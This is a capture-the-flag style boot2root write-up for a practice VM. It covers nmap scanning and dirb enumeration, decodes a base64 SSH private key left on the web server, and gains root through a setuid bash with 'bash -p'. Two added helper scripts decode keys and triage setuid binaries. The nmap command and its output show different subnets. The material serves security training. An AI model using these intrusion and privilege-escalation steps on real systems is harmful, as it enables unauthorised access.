• A write-up of a boot2root practice box.

Host discovery

IP discovery

C:\Users\Yongz\nmap# nmap -sn 192.168.110.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-25 11:08 China Standard Time
Nmap scan report for 192.168.146.20
Host is up (0.00025s latency).
MAC Address: 00:0C:29:D3:73:91 (VMware)
Nmap scan report for 192.168.146.254
Host is up (0.00s latency).
MAC Address: 00:50:56:E0:72:82 (VMware)
Nmap scan report for 192.168.146.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 21.93 seconds
  • The .20 host (the VMware guest with a short latency) is the target. The scan above shows it as 192.168.146.20; the rest of this write-up was done on a different lab network, where the same box sits at 192.168.110.20, which is also why the command and the output above show different subnets.

Service discovery

┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.110.20
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-05 20:22 EST
Nmap scan report for 192.168.110.20
Host is up (0.000037s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
33060/tcp open mysqlx
MAC Address: 00:50:56:85:53:87 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds

┌──(root㉿kali)-[~]
└─# nmap -p 22,80,33060 -sV 192.168.110.20
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-05 20:24 EST
Nmap scan report for 192.168.110.20
Host is up (0.00012s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open mysqlx?
1 service unrecognized despite returning data. If you know the service/version
......
  • There is an SSH service and an HTTP service (port 33060 is MySQL's X Protocol listener, which nmap could not fingerprint; it is left aside for now). My habit is to test the HTTP service first.

Web penetration

Information gathering

  • Browse to the target's HTTP service.

[screenshot]

  • Looking at the page, there is a hint naming a specific user: oscp.

Directory scanning

  • I use dirb for this:
dirb http://192.168.110.20/

[screenshot]

  • It finds a robots.txt file; open it:

[screenshot]

  • That points to a secret.txt file; open that too:

[screenshot]

base64 decoding

  • The whole file ends with ==, which anyone who has seen base64 before will recognise as its padding, so this is almost certainly base64-encoded (an encoding, not encryption; no key is involved). I decoded it on a website, which is fine for a lab box; for anything real, decode locally with base64 -d rather than pasting a private key into someone else's server:

[screenshot]

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

SSH connection

  • This format is clearly an SSH private key, and together with the user hint above (oscp) the next step is an SSH login. Create an id_rsa file and set its permissions to 600:

Note: 777 permissions make ssh refuse the key. If you overwrite an existing ~/.ssh/id_rsa, the id_rsa.pub sitting next to it will also cause an error, because the .pub no longer matches the private key.

cd /tmp
vim id_rsa
cat id_rsa

[screenshot]

  • Run the following to connect (remember to fix the file permissions first):
ssh -i id_rsa oscp@192.168.110.20

[screenshot]

  • Connected successfully!
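The decode-and-connect steps above, done locally instead of through a website, as an added example that is not part of the original write-up. It takes a base64 blob like secret.txt, applies the "ends with ==" heuristic properly (base64 alphabet plus at most two padding characters), decodes it, confirms the OpenSSH header and footer, and writes the key with mode 0600 so ssh accepts it. The sample secret is a constructed placeholder (not a real key) encoded on the fly; the function names and the output path are my own.

```shell
#!/bin/sh
# Added example, not from the original write-up. Function names, the sample
# secret and the output path are my own choices.

# Heuristic from the write-up ("ends with =="), made precise: after joining
# lines, the text must be base64 alphabet with at most two '=' of padding.
looks_like_base64() {
    printf '%s' "$1" | tr -d '\r\n' | grep -qE '^[A-Za-z0-9+/]+={0,2}$'
}

# Decode $1 (base64 text) and write it to $2 as an SSH private key.
# Returns 1 if the text is not base64 or does not decode to an OpenSSH key.
decode_private_key() {
    blob=$1
    out=$2
    looks_like_base64 "$blob" || return 1
    decoded=$(printf '%s' "$blob" | tr -d '\r\n' | base64 -d 2>/dev/null) || return 1
    case $decoded in
        "-----BEGIN OPENSSH PRIVATE KEY-----"*"-----END OPENSSH PRIVATE KEY-----") ;;
        *) return 1 ;;
    esac
    # umask 077 in a subshell: the file is never group/world readable, not
    # even briefly. ssh rejects keys with wider permissions
    # ("UNPROTECTED PRIVATE KEY FILE"), which is the 777 error the write-up hit.
    ( umask 077 && printf '%s\n' "$decoded" > "$out" ) || return 1
    chmod 600 "$out"
}

# First ten characters of `ls -l`, e.g. -rw------- for mode 0600.
key_file_mode() {
    ls -l "$1" | cut -c1-10
}

# Constructed sample: a placeholder body, NOT a real key, encoded the same
# way secret.txt was. The key recovered from the target is not reproduced.
SAMPLE_PLAINTEXT='-----BEGIN OPENSSH PRIVATE KEY-----
placeholder-not-a-real-key
-----END OPENSSH PRIVATE KEY-----'
SAMPLE_SECRET=$(printf '%s\n' "$SAMPLE_PLAINTEXT" | base64)

KEY_OUT=${TMPDIR:-/tmp}/id_rsa.oscp
if decode_private_key "$SAMPLE_SECRET" "$KEY_OUT"; then
    echo "key written to $KEY_OUT with mode $(key_file_mode "$KEY_OUT")"
    echo "next: ssh -i $KEY_OUT oscp@192.168.110.20"
else
    echo "secret did not decode to an OpenSSH private key" >&2
fi
```

On the real box, feed the function the contents of secret.txt (for example `decode_private_key "$(curl -s http://192.168.110.20/secret.txt)" /tmp/id_rsa`) and then run the ssh command it prints. Writing to a fresh path under /tmp, as the write-up does, avoids the mismatched id_rsa.pub problem noted above.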

Bash privilege escalation

  • Start with the three standard questions: id, pwd, whoami.
-bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
-bash-5.0$ pwd
/home/oscp
-bash-5.0$ whoami
oscp
  • The user is also in the sudo and lxd groups (lxd membership is itself a known escalation route on Ubuntu, but it was not needed here). Look for an escalation path:
# sudo fails: it prompts for a password we do not have
-bash-5.0$ sudo -l
[sudo] password for oscp:
# look for setuid-root binaries instead
-bash-5.0$ find / -user root -perm -4000 -print 2>/dev/null
......
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
......
  • bash is setuid root. A setuid bash normally drops the effective uid back to the real one at start-up, so run it with -p to keep euid 0 and get a root shell:
/usr/bin/bash -p

[screenshot]
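The SUID triage above, written out as a reusable check, as an added example that is not from the original write-up. It lists setuid files under a tree, flags the ones whose names are on a short list of binaries known to hand over a shell when setuid root (my own selection, not an exhaustive one), and parses `id` output to confirm that `bash -p` actually kept euid 0. The sample tree and the `id` lines are constructed; `list_suid`, `flag_known`, `effective_uid` and `make_sample_tree` are my own names.

```shell
#!/bin/sh
# Added example, not from the original write-up. Names and the list are mine.

# Binaries that give a root shell when setuid root. bash and sh need -p,
# otherwise they reset the effective uid to the real uid on start-up.
KNOWN_SHELL_SUID="bash sh dash find env vim perl python3"

# Every regular file under $1 with the setuid bit, like the write-up's find.
# The write-up adds -user root; it is left out here so the constructed sample
# tree, owned by the current user, is found.
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Keep only paths whose basename is in KNOWN_SHELL_SUID.
flag_known() {
    while IFS= read -r path; do
        name=${path##*/}
        for k in $KNOWN_SHELL_SUID; do
            if [ "$name" = "$k" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Effective uid from one line of `id` output. id prints euid= only when it
# differs from uid, which is exactly the state after a successful `bash -p`.
effective_uid() {
    case $1 in
        *" euid="*) printf '%s\n' "$1" | sed 's/.* euid=\([0-9]*\).*/\1/' ;;
        *)          printf '%s\n' "$1" | sed 's/^uid=\([0-9]*\).*/\1/' ;;
    esac
}

# Constructed stand-in for the target's filesystem: bash and pkexec setuid,
# ls not. Prints the directory path.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin"
    for f in bash pkexec ls; do
        : > "$d/usr/bin/$f"
    done
    chmod 4755 "$d/usr/bin/bash" "$d/usr/bin/pkexec"
    chmod 755 "$d/usr/bin/ls"
    printf '%s\n' "$d"
}

ROOT=$(make_sample_tree)
echo "setuid files:"
list_suid "$ROOT"
echo "worth trying first:"
list_suid "$ROOT" | flag_known
# Constructed id line as seen after `bash -p`: uid still 1000, euid 0.
echo "euid after bash -p: $(effective_uid 'uid=1000(oscp) gid=1000(oscp) euid=0(root) groups=1000(oscp),27(sudo),116(lxd)')"
rm -rf "$ROOT"
```

On the target, `list_suid / | flag_known` reproduces the shortlist the write-up reached by eye; after `bash -p`, `effective_uid "$(id)"` printing 0 is the same confirmation as the `#` prompt.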

  • Escalation succeeded (the # prompt shows euid 0). Now look for the flag file:
bash-5.0# find /root -name flag*
/root/flag.txt
bash-5.0# cat /root/flag.txt
d73b04b0e696b0945283defa3eee4538